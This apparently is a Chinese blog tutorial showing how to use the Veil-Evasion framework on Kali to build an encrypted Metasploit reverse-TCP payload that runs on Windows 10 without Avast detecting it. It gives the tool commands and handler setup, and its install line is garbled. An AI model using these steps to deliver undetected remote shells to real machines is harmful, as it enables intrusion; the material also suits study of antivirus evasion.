Kali Linux中的VEIL Framework绕过防病毒软件实验
作者:admin | 时间:2019-1-18 18:35:23 | 分类:黑客技术 隐藏侧边栏展开侧边栏
在进行渗透测试的过程中,绕过反病毒产品一直是一个“令人头疼”的事情。今天,我们将跟大家如何绕过目前市面上大部分的免费反病毒产品。
由于很多新手用户喜欢使用AVAST或AVG这样的轻量级的不占用太多系统资源的反病毒产品,因此我们的实验环境使用免费的AVAST反病毒软件,运行系统为Windows 10。
测试工具
1、 Kali
2、 Veil框架
3、 Windows 10
4、 AVAST
Veil框架是一款很老的杀软绕过工具了,它可以生成几乎不可检测的Payload,而且Veil还可以通过命令行终端安装和运行:
apt-get-y install git clone https://github.com/Veil-Framework/Veil-Evasion.git cd Veil-Evasion/ cd setup
setup.sh-c
详细信息请参考该项目的GitHub主页:【传送门】
第一步
在Kali主机上打开命令行窗口,并切换到Veil框架目录中,然后输入:
#python veil-evasion.py
第二步
使用list命令列出所有可用的命令,检查Veil框架提供的可用Payload:
第三步
选择编号37的Payload-“python/shellcode_inject/arc_encrypt”。这个Shellcode使用了arc4加密算法进行加密,并使用内存中的一个密钥文件进行解密。
我们可以使用info命令来查看相关信息,然后使用SET命令来使用phyrion解密器:
SET USE_PHYRION Y
第四步
输入命令生成Payload,默认选择使用msfvenmon。这里我使用的是默认的reverse_tcphandler,并填写了Kali Linux主机的LHOST和LPORT。
第五步
Payload成功生成之后,工具会显示Payload的生成地址以及msf的Handler文件地址。接下来,输入下列命令:
#msfconsole -r /usr/share/veil-output/handlers/payload_handler.rc
第六步
接下来,把我们生成的Payload拷贝到Windows主机中,然后执行Payload,我们这里测试的是最新版本的Avast。
演示视频
大家可以从视频中看到,Payload在执行之后Avast不会弹出任何的警告提示。